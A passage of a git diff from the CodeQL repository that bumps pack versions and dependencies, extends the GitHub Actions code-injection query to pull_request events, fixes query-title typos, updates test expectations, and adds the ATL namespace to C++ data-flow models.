"vendor__triomphe-0.1.14", - "vendor__ungrammar-1.16.1", + "vendor_ts__anyhow-1.0.97", + "vendor_ts__argfile-0.2.1", + "vendor_ts__chalk-ir-0.100.0", + "vendor_ts__chrono-0.4.40", + "vendor_ts__clap-4.5.32", + "vendor_ts__dunce-1.0.5", + "vendor_ts__either-1.15.0", + "vendor_ts__encoding-0.2.33", + "vendor_ts__figment-0.10.19", + "vendor_ts__flate2-1.1.0", + "vendor_ts__glob-0.3.2", + "vendor_ts__globset-0.4.15", + "vendor_ts__itertools-0.14.0", + "vendor_ts__lazy_static-1.5.0", + "vendor_ts__mustache-0.9.0", + "vendor_ts__num-traits-0.2.19", + "vendor_ts__num_cpus-1.16.0", + "vendor_ts__proc-macro2-1.0.94", + "vendor_ts__quote-1.0.40", + "vendor_ts__ra_ap_base_db-0.0.270", + "vendor_ts__ra_ap_cfg-0.0.270", + "vendor_ts__ra_ap_hir-0.0.270", + "vendor_ts__ra_ap_hir_def-0.0.270", + "vendor_ts__ra_ap_hir_expand-0.0.270", + "vendor_ts__ra_ap_hir_ty-0.0.270", + "vendor_ts__ra_ap_ide_db-0.0.270", + "vendor_ts__ra_ap_intern-0.0.270", + "vendor_ts__ra_ap_load-cargo-0.0.270", + "vendor_ts__ra_ap_parser-0.0.270", + "vendor_ts__ra_ap_paths-0.0.270", + "vendor_ts__ra_ap_project_model-0.0.270", + "vendor_ts__ra_ap_span-0.0.270", + "vendor_ts__ra_ap_stdx-0.0.270", + "vendor_ts__ra_ap_syntax-0.0.270", + "vendor_ts__ra_ap_vfs-0.0.270", + "vendor_ts__rand-0.9.0", + "vendor_ts__rayon-1.10.0", + "vendor_ts__regex-1.11.1", + "vendor_ts__serde-1.0.219", + "vendor_ts__serde_json-1.0.140", + "vendor_ts__serde_with-3.12.0", + "vendor_ts__syn-2.0.100", + "vendor_ts__toml-0.8.20", + "vendor_ts__tracing-0.1.41", + "vendor_ts__tracing-flame-0.2.0", + "vendor_ts__tracing-subscriber-0.3.19", + "vendor_ts__tree-sitter-0.24.6", + "vendor_ts__tree-sitter-embedded-template-0.23.2", + "vendor_ts__tree-sitter-json-0.24.8", + "vendor_ts__tree-sitter-ql-0.23.1", + "vendor_ts__tree-sitter-ruby-0.23.1", + "vendor_ts__triomphe-0.1.14", + "vendor_ts__ungrammar-1.16.1", ) http_archive = use_repo_rule("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive") @@ -153,7 +155,7 @@ use_repo(csharp_main_extension, "paket.main") pip = use_extension("@rules_python//python/extensions:pip.bzl", "pip") pip.parse( hub_name = "codegen_deps", - python_version = "3.11", + python_version = "3.12", requirements_lock = "//misc/codegen:requirements_lock.txt", ) use_repo(pip, "codegen_deps") diff --git a/actions/ql/lib/CHANGELOG.md b/actions/ql/lib/CHANGELOG.md index 465cd145d436..6b69ddec1aa0 100644 --- a/actions/ql/lib/CHANGELOG.md +++ b/actions/ql/lib/CHANGELOG.md @@ -1,3 +1,10 @@ +## 0.4.6 + +### Bug Fixes + +* The query `actions/code-injection/medium` now produces alerts for injection + vulnerabilities on `pull_request` events. + ## 0.4.5 No user-facing changes. diff --git a/actions/ql/lib/change-notes/released/0.4.6.md b/actions/ql/lib/change-notes/released/0.4.6.md new file mode 100644 index 000000000000..49cbcbb63a27 --- /dev/null +++ b/actions/ql/lib/change-notes/released/0.4.6.md @@ -0,0 +1,6 @@ +## 0.4.6 + +### Bug Fixes + +* The query `actions/code-injection/medium` now produces alerts for injection + vulnerabilities on `pull_request` events. diff --git a/actions/ql/lib/codeql-pack.release.yml b/actions/ql/lib/codeql-pack.release.yml index 466cd01cf4e7..2b842473675e 100644 --- a/actions/ql/lib/codeql-pack.release.yml +++ b/actions/ql/lib/codeql-pack.release.yml @@ -1,2 +1,2 @@ --- -lastReleaseVersion: 0.4.5 +lastReleaseVersion: 0.4.6 diff --git a/actions/ql/lib/ext/config/context_event_map.yml b/actions/ql/lib/ext/config/context_event_map.yml index 930a4344e12e..541ac8b9a8f6 100644 --- a/actions/ql/lib/ext/config/context_event_map.yml +++ b/actions/ql/lib/ext/config/context_event_map.yml @@ -30,6 +30,9 @@ extensions: - ["pull_request_review_comment", "github.event.review"] - ["pull_request_review_comment", "github.head_ref"] - ["pull_request_review_comment", "github.event.changes"] + - ["pull_request", "github.event.pull_request"] + - ["pull_request", "github.head_ref"] + - ["pull_request", "github.event.changes"] - ["pull_request_target", "github.event.pull_request"] - ["pull_request_target", "github.head_ref"] - ["pull_request_target", "github.event.changes"] diff --git a/actions/ql/lib/ext/config/externally_triggereable_events.yml b/actions/ql/lib/ext/config/externally_triggereable_events.yml index e1bfca52ea79..ae47c684095d 100644 --- a/actions/ql/lib/ext/config/externally_triggereable_events.yml +++ b/actions/ql/lib/ext/config/externally_triggereable_events.yml @@ -12,6 +12,7 @@ extensions: - ["pull_request_comment"] - ["pull_request_review"] - ["pull_request_review_comment"] + - ["pull_request"] - ["pull_request_target"] - ["workflow_run"] # depending on branch filter - ["workflow_call"] # depending on caller diff --git a/actions/ql/lib/qlpack.yml b/actions/ql/lib/qlpack.yml index bb34bc4cf152..2362bf619f74 100644 --- a/actions/ql/lib/qlpack.yml +++ b/actions/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/actions-all -version: 0.4.5 +version: 0.4.6 library: true warnOnImplicitThis: true dependencies: diff --git a/actions/ql/src/CHANGELOG.md b/actions/ql/src/CHANGELOG.md index bd465cd8a20d..c2b0d353f185 100644 --- a/actions/ql/src/CHANGELOG.md +++ b/actions/ql/src/CHANGELOG.md @@ -1,3 +1,11 @@ +## 0.5.3 + +### Bug Fixes + +* Fixed typos in the query and alert titles for the queries + `actions/envpath-injection/critical`, `actions/envpath-injection/medium`, + `actions/envvar-injection/critical`, and `actions/envvar-injection/medium`. + ## 0.5.2 No user-facing changes. @@ -7,9 +15,10 @@ No user-facing changes. ### Bug Fixes * The `actions/unversioned-immutable-action` query will no longer report any alerts, since the - Immutable Actions feature is not yet available for customer use. The query remains in the - default Code Scanning suites for use internal to GitHub. Once the Immutable Actions feature is - available, the query will be updated to report alerts again. + Immutable Actions feature is not yet available for customer use. The query has also been moved + to the experimental folder and will not be used in code scanning unless it is explicitly added + to a code scanning configuration. Once the Immutable Actions feature is available, the query will + be updated to report alerts again. ## 0.5.0 diff --git a/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index 3bb1558788a6..3e6d63a4604d 100644 --- a/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql @@ -1,5 +1,5 @@ /** - * @name PATH Enviroment Variable built from user-controlled sources + * @name PATH environment variable built from user-controlled sources * @description Building the PATH environment variable from user-controlled sources may alter the execution of following system commands * @kind path-problem * @problem.severity error diff --git a/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql b/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql index b49cfb082254..9ea65c6d2ffc 100644 --- a/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql +++ b/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql @@ -1,5 +1,5 @@ /** - * @name PATH Enviroment Variable built from user-controlled sources + * @name PATH environment variable built from user-controlled sources * @description Building the PATH environment variable from user-controlled sources may alter the execution of following system commands * @kind path-problem * @problem.severity error diff --git a/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 13086c630808..28ad3b5b5d28 100644 --- a/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -1,5 +1,5 @@ /** - * @name Enviroment Variable built from user-controlled sources + * @name Environment variable built from user-controlled sources * @description Building an environment variable from user-controlled sources may alter the execution of following system commands * @kind path-problem * @problem.severity error diff --git a/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql b/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql index a3285b2e945e..8bfd174e8f00 100644 --- a/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql +++ b/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql @@ -1,5 +1,5 @@ /** - * @name Enviroment Variable built from user-controlled sources + * @name Environment variable built from user-controlled sources * @description Building an environment variable from user-controlled sources may alter the execution of following system commands * @kind path-problem * @problem.severity error diff --git a/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md b/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md index 9b1782d6ba84..aa7bcf4b0bf7 100644 --- a/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md +++ b/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md @@ -43,7 +43,7 @@ jobs: The following example, correctly creates a temporary directory and extracts the contents of the artifact there before calling `cmd.sh`. ```yaml -name: Insecure Workflow +name: Secure Workflow on: workflow_run: diff --git a/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md b/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md index 9b1782d6ba84..aa7bcf4b0bf7 100644 --- a/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md +++ b/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md @@ -43,7 +43,7 @@ jobs: The following example, correctly creates a temporary directory and extracts the contents of the artifact there before calling `cmd.sh`. ```yaml -name: Insecure Workflow +name: Secure Workflow on: workflow_run: diff --git a/actions/ql/src/change-notes/released/0.5.1.md b/actions/ql/src/change-notes/released/0.5.1.md index b6b4341bae64..e81582aa586c 100644 --- a/actions/ql/src/change-notes/released/0.5.1.md +++ b/actions/ql/src/change-notes/released/0.5.1.md @@ -3,6 +3,7 @@ ### Bug Fixes * The `actions/unversioned-immutable-action` query will no longer report any alerts, since the - Immutable Actions feature is not yet available for customer use. The query remains in the - default Code Scanning suites for use internal to GitHub. Once the Immutable Actions feature is - available, the query will be updated to report alerts again. + Immutable Actions feature is not yet available for customer use. The query has also been moved + to the experimental folder and will not be used in code scanning unless it is explicitly added + to a code scanning configuration. Once the Immutable Actions feature is available, the query will + be updated to report alerts again. diff --git a/actions/ql/src/change-notes/released/0.5.3.md b/actions/ql/src/change-notes/released/0.5.3.md new file mode 100644 index 000000000000..b8c6dc4fa8d4 --- /dev/null +++ b/actions/ql/src/change-notes/released/0.5.3.md @@ -0,0 +1,7 @@ +## 0.5.3 + +### Bug Fixes + +* Fixed typos in the query and alert titles for the queries + `actions/envpath-injection/critical`, `actions/envpath-injection/medium`, + `actions/envvar-injection/critical`, and `actions/envvar-injection/medium`. diff --git a/actions/ql/src/codeql-pack.release.yml b/actions/ql/src/codeql-pack.release.yml index 2d9d3f587f82..2164e038a5d1 100644 --- a/actions/ql/src/codeql-pack.release.yml +++ b/actions/ql/src/codeql-pack.release.yml @@ -1,2 +1,2 @@ --- -lastReleaseVersion: 0.5.2 +lastReleaseVersion: 0.5.3 diff --git a/actions/ql/src/codeql-suites/actions-ccr.qls b/actions/ql/src/codeql-suites/actions-code-quality.qls similarity index 100% rename from actions/ql/src/codeql-suites/actions-ccr.qls rename to actions/ql/src/codeql-suites/actions-code-quality.qls diff --git a/actions/ql/src/codeql-suites/actions-security-and-quality.qls b/actions/ql/src/codeql-suites/actions-security-and-quality.qls index 046d8d367646..91b120e2143c 100644 --- a/actions/ql/src/codeql-suites/actions-security-and-quality.qls +++ b/actions/ql/src/codeql-suites/actions-security-and-quality.qls @@ -1,2 +1,4 @@ - description: Security-and-quality queries for GitHub Actions -- import: codeql-suites/actions-security-extended.qls +- queries: . +- apply: security-and-quality-selectors.yml + from: codeql/suite-helpers diff --git a/actions/ql/src/codeql-suites/actions-security-experimental.qls b/actions/ql/src/codeql-suites/actions-security-experimental.qls index e2e8a3eda881..769535b1324d 100644 --- a/actions/ql/src/codeql-suites/actions-security-experimental.qls +++ b/actions/ql/src/codeql-suites/actions-security-experimental.qls @@ -1,2 +1,4 @@ - description: Extended and experimental security queries for GitHub Actions -- import: codeql-suites/actions-code-scanning.qls +- queries: . +- apply: security-experimental-selectors.yml + from: codeql/suite-helpers diff --git a/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/actions/ql/src/experimental/Security/CWE-829/UnversionedImmutableAction.md similarity index 100% rename from actions/ql/src/Security/CWE-829/UnversionedImmutableAction.md rename to actions/ql/src/experimental/Security/CWE-829/UnversionedImmutableAction.md diff --git a/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/actions/ql/src/experimental/Security/CWE-829/UnversionedImmutableAction.ql similarity index 96% rename from actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql rename to actions/ql/src/experimental/Security/CWE-829/UnversionedImmutableAction.ql index 8cc79b1091a5..89b28f26520c 100644 --- a/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql +++ b/actions/ql/src/experimental/Security/CWE-829/UnversionedImmutableAction.ql @@ -8,6 +8,7 @@ * @tags security * actions * internal + * experimental * external/cwe/cwe-829 */ diff --git a/actions/ql/src/qlpack.yml b/actions/ql/src/qlpack.yml index 527daabd1836..d43eedd54449 100644 --- a/actions/ql/src/qlpack.yml +++ b/actions/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/actions-queries -version: 0.5.2 +version: 0.5.3 library: false warnOnImplicitThis: true groups: [actions, queries] @@ -8,3 +8,4 @@ extractor: actions defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: codeql/actions-all: ${workspace} + codeql/suite-helpers: ${workspace} diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index d44205e4fb92..af788f6280b2 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -400,6 +400,7 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | @@ -629,6 +630,7 @@ nodes | .github/workflows/test19.yml:124:9:129:6 | Run Step: title3 [title] | semmle.label | Run Step: title3 [title] | | .github/workflows/test19.yml:125:14:128:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author)\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author)\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | semmle.label | steps.title3.outputs.title | +| .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 36b6019c10e9..6c948d9559ea 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -400,6 +400,7 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | @@ -629,6 +630,7 @@ nodes | .github/workflows/test19.yml:124:9:129:6 | Run Step: title3 [title] | semmle.label | Run Step: title3 [title] | | .github/workflows/test19.yml:125:14:128:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author)\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author)\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | semmle.label | steps.title3.outputs.title | +| .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | @@ -706,6 +708,7 @@ subpaths | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref index 6ce4123fa5ed..1887390c0f3d 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref @@ -1 +1 @@ -Security/CWE-829/UnversionedImmutableAction.ql \ No newline at end of file +experimental/Security/CWE-829/UnversionedImmutableAction.ql diff --git a/cpp/ql/lib/CHANGELOG.md b/cpp/ql/lib/CHANGELOG.md index 234a154fe456..e958516a5a43 100644 --- a/cpp/ql/lib/CHANGELOG.md +++ b/cpp/ql/lib/CHANGELOG.md @@ -1,3 +1,9 @@ +## 4.1.0 + +### New Features + +* Added `Node.asUncertainDefinition` and `Node.asCertainDefinition` to the `DataFlow::Node` class for querying whether a definition overwrites the entire destination buffer. + ## 4.0.3 No user-facing changes. diff --git a/cpp/ql/lib/change-notes/released/4.1.0.md b/cpp/ql/lib/change-notes/released/4.1.0.md new file mode 100644 index 000000000000..0ba91f0fa68b --- /dev/null +++ b/cpp/ql/lib/change-notes/released/4.1.0.md @@ -0,0 +1,5 @@ +## 4.1.0 + +### New Features + +* Added `Node.asUncertainDefinition` and `Node.asCertainDefinition` to the `DataFlow::Node` class for querying whether a definition overwrites the entire destination buffer. diff --git a/cpp/ql/lib/codeql-pack.release.yml b/cpp/ql/lib/codeql-pack.release.yml index f6bbc961bb14..d5b1bf88d10e 100644 --- a/cpp/ql/lib/codeql-pack.release.yml +++ b/cpp/ql/lib/codeql-pack.release.yml @@ -1,2 +1,2 @@ --- -lastReleaseVersion: 4.0.3 +lastReleaseVersion: 4.1.0 diff --git a/cpp/ql/lib/ext/CA2CAEX.model.yml b/cpp/ql/lib/ext/CA2CAEX.model.yml index ee1d53a537cb..6370e452b099 100644 --- a/cpp/ql/lib/ext/CA2CAEX.model.yml +++ b/cpp/ql/lib/ext/CA2CAEX.model.yml @@ -3,16 +3,16 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "_U_STRINGorID", True, "_U_STRINGorID", "(UINT)", "", "Argument[0]", "Argument[-1].Field[*m_lpstr]", "value", "manual"] - - ["", "_U_STRINGorID", True, "_U_STRINGorID", "(LPCTSTR)", "", "Argument[*0]", "Argument[-1].Field[*m_lpstr]", "value", "manual"] - - ["", "CA2AEX", True, "CA2AEX", "", "", "Argument[*0]", "Argument[-1].Field[*m_psz]", "value", "manual"] - - ["", "CA2AEX", True, "CA2AEX", "", "", "Argument[*0]", "Argument[-1].Field[m_szBuffer]", "value", "manual"] - - ["", "CA2AEX", True, "operator LPSTR", "", "", "Argument[-1].Field[*m_psz]", "ReturnValue[*]", "value", "manual"] - - ["", "CA2AEX", True, "CA2AEX", "", "", "Argument[*0]", "Argument[-1].Field[m_szBuffer]", "value", "manual"] - - ["", "CA2AEX", True, "operator LPSTR", "", "", "Argument[-1].Field[m_szBuffer]", "ReturnValue[*]", "value", "manual"] - - ["", "CA2CAEX", True, "CA2CAEX", "", "", "Argument[*0]", "Argument[-1].Field[*m_psz]", "value", "manual"] - - ["", "CA2CAEX", True, "operator LPCSTR", "", "", "Argument[-1].Field[*m_psz]", "ReturnValue[*]", "value", "manual"] - - ["", "CA2WEX", True, "CA2WEX", "", "", "Argument[*0]", "Argument[-1].Field[*m_psz]", "value", "manual"] - - ["", "CA2WEX", True, "operator LPWSTR", "", "", "Argument[-1].Field[*m_psz]", "ReturnValue[*]", "value", "manual"] - - ["", "CA2WEX", True, "CA2WEX", "", "", "Argument[*0]", "Argument[-1].Field[m_szBuffer]", "value", "manual"] - - ["", "CA2WEX", True, "operator LPWSTR", "", "", "Argument[-1].Field[m_szBuffer]", "ReturnValue[*]", "value", "manual"] \ No newline at end of file + - ["ATL", "_U_STRINGorID", True, "_U_STRINGorID", "(UINT)", "", "Argument[0]", "Argument[-1].Field[*m_lpstr]", "value", "manual"] + - ["ATL", "_U_STRINGorID", True, "_U_STRINGorID", "(LPCTSTR)", "", "Argument[*0]", "Argument[-1].Field[*m_lpstr]", "value", "manual"] + - ["ATL", "CA2AEX", True, "CA2AEX", "", "", "Argument[*0]", "Argument[-1].Field[*m_psz]", "value", "manual"] + - ["ATL", "CA2AEX", True, "CA2AEX", "", "", "Argument[*0]", "Argument[-1].Field[m_szBuffer]", "value", "manual"] + - ["ATL", "CA2AEX", True, "operator LPSTR", "", "", "Argument[-1].Field[*m_psz]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CA2AEX", True, "CA2AEX", "", "", "Argument[*0]", "Argument[-1].Field[m_szBuffer]", "value", "manual"] + - ["ATL", "CA2AEX", True, "operator LPSTR", "", "", "Argument[-1].Field[m_szBuffer]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CA2CAEX", True, "CA2CAEX", "", "", "Argument[*0]", "Argument[-1].Field[*m_psz]", "value", "manual"] + - ["ATL", "CA2CAEX", True, "operator LPCSTR", "", "", "Argument[-1].Field[*m_psz]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CA2WEX", True, "CA2WEX", "", "", "Argument[*0]", "Argument[-1].Field[*m_psz]", "value", "manual"] + - ["ATL", "CA2WEX", True, "operator LPWSTR", "", "", "Argument[-1].Field[*m_psz]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CA2WEX", True, "CA2WEX", "", "", "Argument[*0]", "Argument[-1].Field[m_szBuffer]", "value", "manual"] + - ["ATL", "CA2WEX", True, "operator LPWSTR", "", "", "Argument[-1].Field[m_szBuffer]", "ReturnValue[*]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/lib/ext/CAtlArray.model.yml b/cpp/ql/lib/ext/CAtlArray.model.yml index 29afc0c99598..1b22fcff788c 100644 --- a/cpp/ql/lib/ext/CAtlArray.model.yml +++ b/cpp/ql/lib/ext/CAtlArray.model.yml @@ -3,13 +3,13 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CAtlArray", True, "Add", "", "", "Argument[*@0]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlArray", True, "Append", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlArray", True, "Copy", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlArray", True, "GetAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CAtlArray", True, "GetData", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CAtlArray", True, "InsertArrayAt", "", "", "Argument[*1].Element[@]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlArray", True, "InsertAt", "", "", "Argument[@1]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlArray", True, "SetAt", "", "", "Argument[@1]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlArray", True, "SetAtGrow", "", "", "Argument[@1]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlArray", True, "operator[]", "", "", "Argument[-1].Element[@]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CAtlArray", True, "Add", "", "", "Argument[*@0]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CAtlArray", True, "Append", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CAtlArray", True, "Copy", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CAtlArray", True, "GetAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["ATL", "CAtlArray", True, "GetData", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["ATL", "CAtlArray", True, "InsertArrayAt", "", "", "Argument[*1].Element[@]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CAtlArray", True, "InsertAt", "", "", "Argument[@1]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CAtlArray", True, "SetAt", "", "", "Argument[@1]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CAtlArray", True, "SetAtGrow", "", "", "Argument[@1]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CAtlArray", True, "operator[]", "", "", "Argument[-1].Element[@]", "ReturnValue[*]", "value", "manual"] diff --git a/cpp/ql/lib/ext/CAtlFile.model.yml b/cpp/ql/lib/ext/CAtlFile.model.yml index 03584d62f037..85205ecfe124 100644 --- a/cpp/ql/lib/ext/CAtlFile.model.yml +++ b/cpp/ql/lib/ext/CAtlFile.model.yml @@ -3,7 +3,7 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CAtlFile", True, "CAtlFile", "(CAtlFile &)", "", "Argument[*0]", "Argument[-1]", "value", 